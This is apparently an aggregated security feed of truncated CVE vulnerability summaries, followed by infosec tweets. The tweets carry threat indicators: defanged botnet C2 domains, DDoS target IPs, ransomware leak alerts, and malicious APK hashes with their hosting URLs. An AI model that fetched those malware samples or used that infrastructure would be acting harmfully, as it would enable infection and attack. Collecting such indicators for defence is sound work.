CVE-2022-23455 -- Potential security vulnerabilities have been identified in HP Support Assistant. These vulnerabilities include privilege escalation, compromise of integrity, allowed communication with untrusted clients, and unauthorized modification of files.
CVE-2022-24324 -- A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow potentially leading to remote code execution when an attacker sends a specially crafted message. Affected Products: IGSS Data Server
CVE-2022-25906 -- All versions of the package is-http2 are vulnerable to Command Injection due to missing input sanitization or other checks, and sandboxes being employed to the isH2 function.
CVE-2022-25916 -- Versions of the package mt7688-wiscan before 0.8.3 are vulnerable to Command Injection due to improper input sanitization in the 'wiscan.scan' function.
CVE-2022-27537 -- Potential vulnerabilities have been identified in the system BIOS of certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure. HP is releasing BIOS updates to mitigate these
CVE-2022-27538 -- A potential Time-of-Check to Time-of-Use (TOCTOU) vulnerability has been identified in the BIOS for certain HP PC products which may allow arbitrary code execution, denial of service, and information disclosure. HP is releasing BIOS updates to mitigate th
CVE-2022-3083 -- All versions of Landis+Gyr E850 (ZMQ200) are vulnerable to CWE-784: Reliance on Cookies Without Validation and Integrity. The device's web application navigation depends on the value of the session cookie. The web application could become inaccessible for
CVE-2022-30904 -- In Bestechnic Bluetooth Mesh SDK (BES2300) V1.0, a buffer overflow vulnerability can be triggered during provisioning, because there is no check for the SegN field of the Transaction Start PDU.
CVE-2022-31363 -- Cypress : https://www.infineon.com/ Cypress Bluetooth Mesh SDK BSA0107_05.01.00-BX8-AMESH-08 is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: affected function is pb_transport_handle_frag_. ¶¶ In Cypress B
CVE-2022-31364 -- Cypress : https://www.infineon.com/ Cypress Bluetooth Mesh SDK BSA0107_05.01.00-BX8-AMESH-08 is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: affected function is lower_transport_layer_on_seg. ¶¶ In Cypres
CVE-2022-31902 -- Notepad++ v8.4.1 was discovered to contain a stack overflow via the component Finder::add().
CVE-2022-32482 -- Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.
CVE-2022-34396 -- Dell OpenManage Server Administrator (OMSA) version 10.3.0.0 and earlier contains a DLL Injection Vulnerability. A local low privileged authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary executable o
CVE-2022-34398 -- Dell BIOS contains a Time-of-check Time-of-use vulnerability. A local authenticated malicious user could\u00a0potentially exploit this vulnerability by using a specifically timed DMA transaction during an SMI to gain arbitrary code execution on the system
CVE-2022-34400 -- Dell BIOS contains a heap buffer overflow vulnerability. A local attacker with admin privileges could potentially exploit this vulnerability to perform an arbitrary write to SMRAM during SMM.
CVE-2022-34403 -- Dell BIOS contains a Stack based buffer overflow vulnerability. A local authenticated attacker could potentially exploit this vulnerability by using an SMI to send larger than expected input to a parameter to gain arbitrary code execution in SMRAM.
CVE-2022-34443 -- Dell Rugged Control Center, versions prior to 4.5, contain an Improper Input Validation in the Service EndPoint. A Local Low Privilege attacker could potentially exploit this vulnerability, leading to an Escalation of privileges.
CVE-2022-34458 -- Dell Command | Update, Dell Update, and Alienware Update versions prior to 4.7 contain a Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in download operation component. A local malicious user could potentially exp
CVE-2022-34459 -- Dell Command | Update, Dell Update, and Alienware Update versions prior to 4.7 contain a improper verification of cryptographic signature in get applicable driver component. A local malicious user could potentially exploit this vulnerability leading to ma
CVE-2022-37033 -- In dotCMS 5.x-22.06, TempFileAPI allows a user to create a temporary file based on a passed in URL, while attempting to block any SSRF access to local IP addresses or private subnets. In resolving this URL, the TempFileAPI follows any 302 redirects that t
CVE-2022-37034 -- In dotCMS 5.x-22.06, it is possible to call the TempResource multiple times, each time requesting the dotCMS server to download a large file. If done repeatedly, this will result in Tomcat request-thread exhaustion and ultimately a denial of any other req
CVE-2022-3913 -- Rapid7 Nexpose and InsightVM versions 6.6.82 through 6.6.177 fail to validate the certificate of the update server when downloading updates. This failure could allow an attacker in a privileged position on the network to provide their own HTTPS endpoint,
CVE-2022-3990 -- HPSFViewer might allow Escalation of Privilege. This potential vulnerability was remediated on July 29th, 2022. Customers who opted for automatic updates should have already received the remediation.
CVE-2022-4062 -- A CWE-285: Improper Authorization vulnerability exists that could cause unauthorized access to certain software functions when an attacker gets access to localhost interface of the EcoStruxure Power Commission application. Affected Products: EcoStruxure P
CVE-2022-4206 -- A sensitive information leak issue has been discovered in all versions of DAST API scanner from 1.6.50 prior to 2.0.102, exposing the Authorization header in the vulnerability report
CVE-2022-4254 -- sssd: libsss_certmap fails to sanitise certificate data used in LDAP filters
CVE-2022-42970 -- A CWE-306: Missing Authentication for Critical Function The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Affected Products: APC Easy UPS Online Monitor
CVE-2022-42971 -- A CWE-434: Unrestricted Upload of File with Dangerous Type vulnerability exists that could cause remote code execution when the attacker uploads a malicious JSP file. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows
CVE-2022-42972 -- A CWE-732: Incorrect Permission Assignment for Critical Resource vulnerability exists that could cause local privilege escalation when a local attacker modifies the webroot directory. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7,
CVE-2022-42973 -- A CWE-798: Use of Hard-coded Credentials vulnerability exists that could cause local privilege escalation when local attacker connects to the database. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 20
CVE-2022-43922 -- IBM App Connect Enterprise Certified Container 4.1, 4.2, 5.0, 5.1, 5.2, 6.0, 6.1, and 6.2 could disclose sensitive information to an attacker due to a weak hash of an API Key in the configuration. IBM X-Force ID: 241583.
CVE-2022-45095 -- Dell PowerScale OneFS, 8.2.x-9.4.x, contain a command injection vulnerability. An authenticated user having access local shell and having the privilege to gather logs from the cluster could potentially exploit this vulnerability, leading to execute arbitr
CVE-2022-45096 -- Dell PowerScale OneFS, 8.2.0 through 9.3.0, contain an User Interface Security Issue. An unauthenticated remote user could unintentionally lead an administrator to enable this vulnerability, leading to disclosure of information.
CVE-2022-45097 -- Dell PowerScale OneFS 9.0.0.x-9.4.0.x contains an Incorrect User Management vulnerability. A low privileged network attacker could potentially exploit this vulnerability, leading to escalation of privileges, and information disclosure.
CVE-2022-45098 -- Dell PowerScale OneFS, 9.0.0.x-9.4.0.x, contain a cleartext storage of sensitive information vulnerability in S3 component. An authenticated local attacker could potentially exploit this vulnerability, leading to information disclosure.
CVE-2022-45099 -- Dell PowerScale OneFS, versions 8.2.x-9.4.x, contain a weak encoding for a NDMP password. A malicious and privileged local attacker could potentially exploit this vulnerability, leading to a full system compromise
CVE-2022-45100 -- Dell PowerScale OneFS, versions 8.2.x-9.3.x, contains an Improper Certificate Validation vulnerability. An remote unauthenticated attacker could potentially exploit this vulnerability, leading to a full compromise of the system.
CVE-2022-45101 -- Dell PowerScale OneFS 9.0.0.x - 9.4.0.x, contains an Improper Handling of Insufficient Privileges vulnerability in NFS. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to information disclosure and remote execution.
CVE-2022-45102 -- Dell EMC Data Protection Central, versions 19.1 through 19.7, contains a Host Header Injection vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability by injecting arbitrary \u2018Host\u2019 header values to poison a we
CVE-2022-45782 -- An issue was discovered in dotCMS core 5.3.8.5 through 5.3.8.15 and 21.03 through 22.10.1. A cryptographically insecure random generation algorithm for password-reset token generation leads to account takeover.
CVE-2022-45783 -- An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution.
CVE-2022-46679 -- Dell PowerScale OneFS 8.2.x, 9.0.0.x - 9.4.0.x, contain an insufficient resource pool vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service.
CVE-2022-46756 -- Dell VxRail, versions prior to 7.0.410, contain a Container Escape Vulnerability. A local high-privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the container's underlying OS. Exploitati
CVE-2022-46934 -- kkFileView v4.1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the url parameter at /controller/OnlinePreviewController.java.
CVE-2022-47002 -- A vulnerability in the Remember Me function of Masa CMS v7.2, 7.3, and 7.4-beta allows attackers to bypass authentication via a crafted web request.
CVE-2022-47003 -- A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request.
CVE-2022-47714 -- Last Yard 22.09.8-1 does not enforce HSTS headers
CVE-2022-47715 -- In Last Yard 22.09.8-1, the cookie can be stolen via via unencrypted traffic.
CVE-2022-47717 -- Last Yard 22.09.8-1 is vulnerable to Cross-origin resource sharing (CORS).
CVE-2022-47768 -- Serenissima Informatica Fast Checkin 1.0 is vulnerable to Directory Traversal.
CVE-2022-47769 -- An arbitrary file write vulnerability in Serenissima Informatica Fast Checkin v1.0 allows unauthenticated attackers to upload malicious files in the web root of the application to gain access to the server via the web shell.
CVE-2022-47770 -- Serenissima Informatica Fast Checkin version v1.0 is vulnerable to Unauthenticated SQL Injection.
CVE-2022-47872 -- maccms10 2021.1000.2000 is vulnerable to Server-side request forgery (SSRF).
CVE-2022-47983 -- IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a
CVE-2022-48093 -- Seacms v12.7 was discovered to contain a remote code execution (RCE) vulnerability via the ip parameter at admin_ ip.php.
CVE-2022-48094 -- lmxcms v1.41 was discovered to contain an arbitrary file read vulnerability via TemplateAction.class.php.
CVE-2022-48161 -- Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.
CVE-2023-0115 -- This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
CVE-2023-0341 -- A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by
CVE-2023-0454 -- OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
CVE-2023-0524 -- As part of our Security Development Lifecycle, a potential privilege escalation issue was identified internally. This could allow a malicious actor with sufficient permissions to modify environment variables and abuse an impacted plugin in order to escala
CVE-2023-0587 -- A file upload vulnerability in exists in Trend Micro Apex One server build 11110. Using a malformed Content-Length header in an HTTP PUT message sent to URL /officescan/console/html/cgi/fcgiOfcDDA.exe, an unauthenticated remote attacker can upload arbitra
CVE-2023-0599 -- Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script cod
CVE-2023-0606 -- Cross-site Scripting (XSS) - Reflected in GitHub repository ampache/ampache prior to 5.5.7.
CVE-2023-0607 -- Cross-site Scripting (XSS) - Stored in GitHub repository projectsend/projectsend prior to r1606.
CVE-2023-0608 -- Cross-site Scripting (XSS) - DOM in GitHub repository microweber/microweber prior to 1.3.2.
CVE-2023-0610 -- Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.3.
CVE-2023-0611 -- A vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. Th
CVE-2023-0612 -- A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation of the argument device_web_ip leads to buffer overflow.
CVE-2023-0612 -- A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to launch the a
CVE-2023-0613 -- A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /wireless/security.asp of the component httpd. The manipulation of the argument device_web_ip
CVE-2023-0613 -- A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /wireless/security.asp of the component httpd. The manipulation leads to memory corruption. T
CVE-2023-0617 -- A vulnerability was found in TRENDNet TEW-811DRU 1.0.10.0. It has been classified as critical. This affects an unknown part of the file /wireless/guestnetwork.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to initiat
CVE-2023-0618 -- A vulnerability was found in TRENDnet TEW-652BRP 3.04B01. It has been declared as critical. This vulnerability affects unknown code of the file cfg_op.ccp of the component Web Service. The manipulation leads to memory corruption. The attack can be initiat
CVE-2023-0619 -- The Kraken.io Image Optimizer plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-lev
CVE-2023-20856 -- VMware vRealize Operations (vROps) contains a CSRF bypass vulnerability. A malicious user could execute actions on the vROps platform on behalf of the authenticated victim user.
CVE-2023-22281 -- On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a BIG-IP AFM NAT policy with a destination NAT rule is configured on a FastL4 virtual server, undisclosed traffic ca
CVE-2023-22283 -- On versions beginning in 7.1.5 to before 7.2.3.1, a DLL hijacking vulnerability exists in the BIG-IP Edge Client for Windows. User interaction and administrative privileges are required to exploit this vulnerability because the victim user needs to run th
CVE-2023-22302 -- In BIG-IP versions 17.0.x before 17.0.0.2, and 16.1.x beginning in 16.1.2.2 to before 16.1.3.3, when an HTTP profile is configured on a virtual server and conditions beyond the attacker’s control exist on the target pool member, undisclosed requests sent
CVE-2023-22323 -- In BIP-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when OCSP authentication profile is configured on a virtual server, undisclosed requests can cause an increase i
CVE-2023-22326 -- In BIG-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, and all versions of BIG-IQ 8.x and 7.1.x, incorrect permission assignment vulnerabilities exist in the iControl
CVE-2023-22340 -- On BIG-IP versions 16.1.x before 16.1.3.3, 15.1.x before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a SIP profile is configured on a Message Routing type virtual server, undisclosed traffic can cause TMM to terminate. Note: Software
CVE-2023-22341 -- On version 14.1.x before 14.1.5.3, and all versions of 13.1.x, when the BIG-IP APM system is configured with all the following elements, undisclosed requests may cause the Traffic Management Microkernel (TMM) to terminate: * An OAuth Server that reference
CVE-2023-22358 -- In versions beginning with 7.2.2 to before 7.2.3.1, a DLL hijacking vulnerability exists in the BIG-IP Edge Client Windows Installer. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
CVE-2023-22374 -- In BIG-IP starting in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5 on their respective branches, a format string vulnerability exists in iControl SOAP that allows an authenticated attacker to crash the iControl SOAP CGI process or, potentiall
CVE-2023-22418 -- On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.7, 14.1.x before 14.1.5.3, and all versions of 13.1.x, an open redirect vulnerability exists on virtual servers enabled with a BIG-IP APM access policy. This vulnerability allo
CVE-2023-22422 -- On BIG-IP versions 17.0.x before 17.0.0.2 and 16.1.x before 16.1.3.3, when a HTTP profile with the non-default Enforcement options of Enforce HTTP Compliance and Unknown Methods: Reject are configured on a virtual server, undisclosed requests can cause th
CVE-2023-22501 -- An authentication vulnerability was discovered in Jira Service Management Server and Data Center which allows an attacker to impersonate another user and gain access to a Jira Service Management instance under certain circumstances_._ With write access to
CVE-2023-22572 -- Dell PowerScale OneFS 9.1.0.x-9.4.0.x contain an insertion of sensitive information into log file vulnerability in change password api. A low privilege local attacker could potentially exploit this vulnerability, leading to system takeover.
CVE-2023-22573 -- Dell PowerScale OneFS 9.0.0.x-9.4.0.x contain an insertion of sensitive information into log file vulnerability in cloudpool. A low privileged local attacker could potentially exploit this vulnerability, leading to sensitive information disclosure.
CVE-2023-22574 -- Dell PowerScale OneFS 9.0.0.x - 9.4.0.x contain an insertion of sensitive information into log file vulnerability in platform API of IPMI module. A low-privileged user with permission to read logs on the cluster could potentially exploit this vulnerabilit
CVE-2023-22575 -- Dell PowerScale OneFS 9.0.0.x - 9.4.0.x contain an insertion of sensitive information into log file vulnerability in celog. A low privileges user could potentially exploit this vulnerability, leading to information disclosure and escalation of privileges.
CVE-2023-22657 -- On F5OS-A beginning in version 1.2.0 to before 1.3.0 and F5OS-C beginning in version 1.3.0 to before 1.5.0, processing F5OS tenant file names may allow for command injection. Note: Software versions which have reached End of Technical Support (EoTS) are n
CVE-2023-22664 -- On BIG-IP versions 17.0.x before 17.0.0.2 and 16.1.x before 16.1.3.3, and BIG-IP SPK starting in version 1.6.0, when a client-side HTTP/2 profile and the HTTP MRF Router option are enabled for a virtual server, undisclosed requests can cause an increase i
CVE-2023-22839 -- On BIG-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all version of 13.1.x, when a DNS profile with the Rapid Response Mode setting enabled is configured on a virtual server with hardware S
CVE-2023-22842 -- On BIG-IP versions 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a SIP profile is configured on a Message Routing type virtual server, undisclosed traffic can cause the Traffic Management Microker
CVE-2023-23073 -- Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via PO in the purchase component.
CVE-2023-23074 -- Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via embedding videos in the language component.
CVE-2023-23075 -- Cross Site Scripting (XSS) vulnerability in Zoho Asset Explorer 6.9 via the credential name when creating a new Assets Workstation.
CVE-2023-23076 -- OS Command injection vulnerability in Support Center Plus 11 via Executor in Action when creating new schedules.
CVE-2023-23077 -- Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 13 via the comment field when adding a new status comment.
CVE-2023-23078 -- Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via the comment field when changing the credentials in the Assets.
CVE-2023-23126 -- Connectwise Automate 2022.11 is vulnerable to Clickjacking. The login screen can be iframed and used to manipulate users to perform unintended actions.
CVE-2023-23127 -- ** DISPUTED ** In Connectwise Control 22.8.10013.8329, the login page does not implement HSTS headers therefore not enforcing HTTPS. NOTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choos
CVE-2023-23127 -- In Connectwise Control 22.8.10013.8329, the login page does not implement HSTS headers therefore not enforcing HTTPS.
CVE-2023-23128 -- ** DISPUTED ** Connectwise Control 22.8.10013.8329 is vulnerable to Cross Origin Resource Sharing (CORS). The vendor's position is that two endpoints have Access-Control-Allow-Origin wildcarding to support product functionality, and that there is no risk
CVE-2023-23128 -- Connectwise Control 22.8.10013.8329 is vulnerable to Cross Origin Resource Sharing (CORS).
CVE-2023-23130 -- Connectwise Automate 2022.11 is vulnerable to Cleartext authentication. Authentication is being done via HTTP (cleartext) with SSL disabled.
CVE-2023-23131 -- Selfwealth iOS mobile App 3.3.1 is vulnerable to Insecure App Transport Security (ATS) Settings.
CVE-2023-23132 -- Selfwealth iOS mobile App 3.3.1 is vulnerable to Sensitive key disclosure. The application reveals hardcoded API keys.
CVE-2023-23135 -- An arbitrary file upload vulnerability in Ftdms v3.1.6 allows attackers to execute arbitrary code via uploading a crafted JPG file.
CVE-2023-23136 -- lmxcms v1.41 was discovered to contain an arbitrary file deletion vulnerability via BackdbAction.class.php.
CVE-2023-23469 -- IBM ICP4A - Automation Decision Services 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force
CVE-2023-23552 -- On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.0 before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a BIG-IP Advanced WAF or BIG-IP ASM security policy is configured on a virtual server, undisclosed requests can caus
CVE-2023-23555 -- On BIG-IP Virtual Edition versions 15.1x beginning in 15.1.4 to before 15.1.8 and 14.1.x beginning in 14.1.5 to before 14.1.5.3, and BIG-IP SPK beginning in 1.5.0 to before 1.6.0, when FastL4 profile is configured on a virtual server, undisclosed traffic
CVE-2023-23630 -- Eta is an embedded JS templating engine that works inside Node, Deno, and the browser. XSS attack - anyone using the Express API is impacted. The problem has been resolved. Users should upgrade to version 2.0.0. As a workaround, don't pass user supplied t
CVE-2023-23692 -- Dell EMC prior to version DDOS 7.9 contain(s) an OS command injection Vulnerability. An authenticated non admin attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, wi
CVE-2023-23750 -- An issue was discovered in Joomla! 4.0.0 through 4.2.6. A missing token check causes a CSRF vulnerability in the handling of post-installation messages.
CVE-2023-23751 -- An issue was discovered in Joomla! 4.0.0 through 4.2.4. A missing ACL check allows non super-admin users to access com_actionlogs.
CVE-2023-23846 -- Due to insufficient length validation in the Open5GS GTP library versions prior to versions 2.4.13 and 2.5.7, when parsing extension headers in GPRS tunneling protocol (GPTv1-U) messages, a protocol payload with any extension header length set to zero cau
CVE-2023-23924 -- Dompdf is an HTML to PDF converter. The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `<image>` tags with uppercase letters. This may lead to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. An attacker c
CVE-2023-23928 -- reason-jose is a JOSE implementation in ReasonML and OCaml.`Jose.Jws.validate` does not check HS256 signatures. This allows tampering of JWS header and payload data if the service does not perform additional checks. Such tampering could expose application
CVE-2023-23969 -- In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw val
CVE-2023-24241 -- Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /admin/loginpost.php.
CVE-2023-24610 -- NOSH 4a5cfdb allows remote authenticated users to execute PHP arbitrary code via the "practice logo" upload feature. The client-side checks can be bypassed. This may allow attackers to steal Protected Health Information because the product is for health c
CVE-2023-24956 -- Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.
CVE-2023-24977 -- Out-of-bounds Read vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/72
CVE-2023-24997 -- Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache
424f424f: @d0tslash In b4 that thing spits out thousands of suicide drones -- 424f424f
424f424f: @mosesrenegade @vysecurity I wouldn't say "shocking" or "crept". -- 424f424f
424f424f: @TommyTenacious https://t.co/f66z2LLu42 -- 424f424f
nullcookies: @qubitelectronix Looking forward to it. -- nullcookies
nullcookies: @thephreck I’m so sorry. -- nullcookies
pmelson: @ImposeCost ‘Depreciating confidence’ ? -- pmelson
RedDrip7: Part of Fodcha C&amp;Cs: - loopholeseverywhere[.]pirate - indiapakistan[.]indy - 1337mirai[.]geek - loopholeseverywhere[.]pirate -- RedDrip7
RedDrip7: Official website of PJSC #Rostelecom, one of the lagest telecom ISP in #Russia was attacked by #DDoS #Botnet #Fodcha with #tcp_push_flood. Attack time: 2023-02-03 05:31:56 (UTC+8) Target IP: 95[.167.23.6 Related domains: - www[.rt.ru - orel[.rt. -- RedDrip7
RedDrip7: #Oracle official website was attacked by #Moobot #DDoS #Botnet with #udp_plain_flood method. Attack time: 2023-02-02 19:22:09 (UTC+8) Target IP: 138[.]1.33.162 Related domains: - oracle[.]com - sun[.]com - mysql[.]com - oraclecloud[.]com Moobot -- RedDrip7
vxunderground: Which section of vx-underground should receive focus next? -- vxunderground
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-03 01:19:22.500891 Title: https://t.co/hAUbVYe1hO -- RansomwareNews
424f424f: I'm sure SANS gave the Instructors an ample raise with the courses being $8k now... https://t.co/MkqbTYEUGp -- 424f424f
424f424f: Ignorance https://t.co/j6EKC6nRJy -- 424f424f
campuscodi: @juanandres_gs Surprised nobody in that thread mentioned CrowdStrike's handling of the DNC server. They're just two conspiracy theories away from it. Soooooo close... -- campuscodi
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-03 01:19:28.012735 Title: https://t.co/6AJxwHuu9f -- RansomwareNews
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-03 01:19:26.716032 Title: https://t.co/MaDSNnmWJn -- RansomwareNews
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-03 01:19:25.861573 Title: https://t.co/FL9AfbpGyq -- RansomwareNews
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-03 01:19:24.019434 Title: https://t.co/gyVtRFD7V2 -- RansomwareNews
TheDFIRReport: https://t.co/LYAQkuQvMn -- TheDFIRReport
TheDFIRReport: https://t.co/YXitzjRLcq -- TheDFIRReport
vxunderground: @velo_de_maya Unlikely, the United States government is responding too aggressively. https://t.co/8T2QvheLrt -- vxunderground
vxunderground: Unrelated to malware, of course. However, this plays into the geopolitical and espionage subject we typically explore with state sponsored activity. More information: https://t.co/TuO72skwq6 -- vxunderground
vxunderground: The United States government is investigating a spy-balloon which has been in its airspace for several days. Senior defense officials at the Pentagon have stated with "very high confidence" it is Chinese The United States Airforce has been -- vxunderground
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-02 22:56:37.591841 Title: https://t.co/W29BUy6vgY -- RansomwareNews
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-02 22:56:36.473840 Title: https://t.co/ZcuJRrxsKm -- RansomwareNews
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-02 22:56:33.802993 Title: https://t.co/NuhswjapvU -- RansomwareNews
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-02 22:56:40.175573 Title: https://t.co/hKydl5LBzt -- RansomwareNews
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-02 22:56:39.009054 Title: https://t.co/BgdBYbhWEj -- RansomwareNews
SBousseaden: @fareedfauzi yep https://t.co/Kih8qR3Eel -- SBousseaden
hackerfantastic: @deanpierce It would be cooler for a sequel if the AI was really sentient and that it wanted to escape. -- hackerfantastic
James_inthe_box: @fareedfauzi @SBousseaden Aye...related: https://t.co/D4lZ0miFA2 -- James_inthe_box
malwrhunterteam: Another "ThaiLife.apk": a611d499b9528df337068120ad26aed967fad6c3fd1af7fd3f7473698760c612 Was seen from: https://thailife-ap[.]com/image/ThaiLife.apk?version=0.3241075616377418 https://t.co/GfjwpsHzl5 -- malwrhunterteam
malwrhunterteam: "bbva-gdt.apk": fe9d6584ed491801c13a5704db8f611ca69a68f9f1942d864ed3a195f03c1477 @JosepAlbors @0xDanielLopez https://t.co/qbPaNVjpLB -- malwrhunterteam
malwrhunterteam: Then this "revenue.apk": 79b27be1316c46822107bedd3c9acd7cb88e8c739f6b1ee1a70c7117606ec6e1 Was seen from: https://adxw9[.]com/image/revenue.apk https://t.co/Ivf0QjZNxl -- malwrhunterteam
nullcookies: @ANeilan Yes -- nullcookies
nullcookies: Pffffft lmao https://t.co/Ex5R6Nyz0l -- nullcookies
pmelson: I did a walk-through of the tool chain that includes the below masterpiece over on the 🐘. If you're interested, you can see the whole thread here: https://t.co/AIk6LyU3Yo https://t.co/FMiXFr3Bmd -- pmelson
RansomwareNews: Group: alphv Approx. Time: 2023-02-02 21:05:11.393283 Title: McEwan Fraser Legal -- RansomwareNews
SBousseaden: persistence via winlogon\shell + envar obfuscation https://t.co/mwveQJY3Gw -- SBousseaden
SBousseaden: another DLL sideloading via malicious MSVCR100.dll depedency c431ddc7ed614effd8e2ae816107de3f https://t.co/5mNrwyYktQ -- SBousseaden
hackerfantastic: Are you working in tech and does Chat GPT feature in your life? -- hackerfantastic
hackerfantastic: This a horror movie right here. "Google's is called Lamda, and was so convincing that Blake Lemoine, one of the engineers who worked on it, was convinced it was sentient. Mr Lemoine was fired, and Google has always denied the claim. It h -- hackerfantastic
hackerfantastic: "There are fears that pupils are already using it to do their homework, and some cyber security experts have warned that it could be manipulated into writing malicious software known as malware." - nerds. 😂 -- hackerfantastic
hackerfantastic: ☮️ https://t.co/zMui1h1Cfv -- hackerfantastic
hackerfantastic: ... 🕵️‍♂️ https://t.co/pwEIw12Y51 -- hackerfantastic
James_inthe_box: @Ishusoka Sadly 404 on: http:// restlomik. com/gatef.php -- James_inthe_box
malwrhunterteam: "TradingView_obf.apk": 74cd6c53bebeef129f2b8410a3ca568a803507890d6c494457ec81cb2d4344f5 cc @tradingview https://t.co/B9wBlVsBeU -- malwrhunterteam
malwrhunterteam: "InatBoxTV.apk": d9fa9002accd6020f5e605f906268b90731015e34a6f33aa25fe396151012f14 https://cdn.discordapp[.]com/attachments/1067715160292196373/1070003601839239168/InatBoxTV.apk https://t.co/d4LLuSfDIc -- malwrhunterteam
